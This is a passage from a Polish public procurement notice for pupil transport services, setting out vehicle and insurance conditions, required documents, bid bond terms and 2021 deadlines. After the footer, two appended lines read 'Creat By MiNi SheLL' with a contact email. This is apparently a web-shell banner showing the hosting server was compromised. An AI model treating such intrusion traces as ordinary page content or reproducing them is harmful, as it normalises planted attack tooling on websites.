walutach innych niż PLN, Zamawiający przyjmie średni kurs danej waluty publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych Narodowy Bank Polski nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia po publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, w którym zostanie on opublikowany.<br/><br/>2)	iż dysponuje lub dysponować będzie, co najmniej:<br/>a)	4 pojazdami przystosowanymi do przewozu osób, które dopuszczone są do ruchu na terytorium RP w tym:<br/>­	co najmniej 2 autobusy o ilości miejsc siedzących nie mniejszej niż 50 osób plus kierowca;<br/>­	co najmniej 1 autobus o ilości miejsc siedzących nie mniejszej niż 55 osób plus kierowca;<br/>­	co najmniej 1 pojazd o ilości miejsc nie mniejszej niż 18 plus kierowca.<br/>Pojazdy oferowane do przewozu uczniów i dzieci muszą być dopuszczone do ruchu oraz posiadać aktualne badanie techniczne pojazdu (wpis w dowodzie rejestracyjnym) oraz aktualne polisy ubezpieczenia: OC na pojazd zgłoszony do przewozu oraz polisę NNW. <br/>Ocenę spełniania ww. warunku udziału w postępowaniu Zamawiający przeprowadzi na podstawie wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami. <br/>Sytuacja ekonomiczna i finansowa: Wykonawca spełni warunek udziału w postępowaniu dotyczący sytuacji ekonomicznej i finansowej, jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną w wysokości co najmniej 200 000,00 złotych brutto.<br/><br/>Na potwierdzenie niniejszego warunku należy złożyć dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia. <br/>Uwaga: <br/>•	Dla potrzeb oceny spełniania warunku określonego, powyżej, jeśli wartość lub wartości zostaną podane w walutach innych niż PLN, Zamawiający przyjmie średni kurs danej waluty publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych Narodowy Bank Polski nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia po publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, w którym zostanie on opublikowany. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Aktualna licencja na wykonywanie krajowego transportu drogowego osób.<br/>2.	Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami;<br/>3.	Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy;<br/>4.	Dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę należy złożyć wraz z następującymi załącznikami:<br/>1)	Oferta cenowa zgodna z załączonym drukiem „formularza oferty”- załącznik SWZ, która zawiera cenę wyliczoną w sposób opisany w rodziale XVII SWZ wraz z formularzem cenowym; <br/>2)	Oświadczenia, o których mowa w rozdziale V ust. 2 SWZ (załączniki do SWZ).<br/>3)	Pełnomocnictwo - Jeżeli oferta wraz z oświadczeniami składana jest przez pełnomocnika należy do oferty załączyć pełnomocnictwo upoważniające pełnomocnika do tej czynności<br/>4)	Wykonawca, który polega na zasobach innych podmiotów składa wraz z ofertą oświadczenie podmiotu o udostępnieniu zasobów wskazujące na okoliczności opisane <br/>w rozdziale V ust. 6 SWZ oraz oświadczenia podmiotu udostępniającego zasoby potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, o których mowa w Rozdziale V ust. 1.<br/>5)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika jaki zakres rzeczowy wykonania zamówienia realizować zamierzają poszczególni Wykonawcy.<br/>6)	Oryginał wniesienia wadium, jeżeli wadium wnoszone jest w formie niepieniężnej. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga wniesienia wadium.<br/>2.	Wadium w wysokości 3 000,00 złotych (trzy tysiące złotych 00/100) należy wnieść przed upływem terminu składania ofert.<br/>3.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>3.	Dowód wniesienia wadium w oryginale należy załączyć do oferty jeżeli wadium zostało wniesione <br/>w formie niepieniężnej. <br/>4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy w Ludowym Banku Spółdzielczym w Zduńskiej Woli nr rachunku: 95 9279 0007 0060 6114 2000 0240 z dopiskiem „Wadium" i nr referencyjny: GKI.271.11.2021.AZK. <br/>5.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>6.	Zamawiający zwraca wadium zgodnie z art. 98, z zastrzeżeniem art. 98 ust. 6 pkt.1 ustawy PZP.<br/>7.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli:<br/>1)	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1, <br/>z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1, oświadczenia, o którym mowa w art. 125 ust. 1, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3), co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej;<br/>2)	Wykonawca, którego oferta została wybrana: <br/>a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych <br/>w ofercie;<br/>b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; <br/>3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, którego oferta została wybrana <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	W przypadku wnoszenia oferty wspólnej przez dwa lub więcej podmioty gospodarcze (konsorcja/spółki cywilne) oferta musi spełniać wymagania określone w art. 58 ustawy Prawo zamówień publicznych, w tym:<br/>1)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie <br/>z art. 58 ust. 2 ustawy Pzp Wykonawcy ustanawiają pełnomocnika do reprezentowania ich <br/>w postępowaniu o udzielenie zamówienia lub pełnomocnictwo do reprezentowania <br/>w postępowaniu i zawarcia umowy. W związku z powyższym niezbędne jest przedłożenie <br/>w ofercie dokumentu zawierającego pełnomocnictwo w celu ustalenia podmiotu uprawnionego do występowania w imieniu Wykonawców w sposób umożliwiający ich identyfikację. <br/>2)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika jaki zakres rzeczowy zamówienia realizować zamierzają poszczególni Wykonawcy.<br/>3)	W celu wykazania niepodlegania wykluczeniu z postępowania o udzielenie zamówienia <br/>w rozdziale VI wymagane jest załączenie do oferty oświadczenia i przedłożenia na wezwanie dokumentów dla każdego konsorcjanta oddzielnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający szczegółowo określił warunki zmiany umowy w załączniku nr 2 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-20 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl, https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-20 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-18</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-12 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com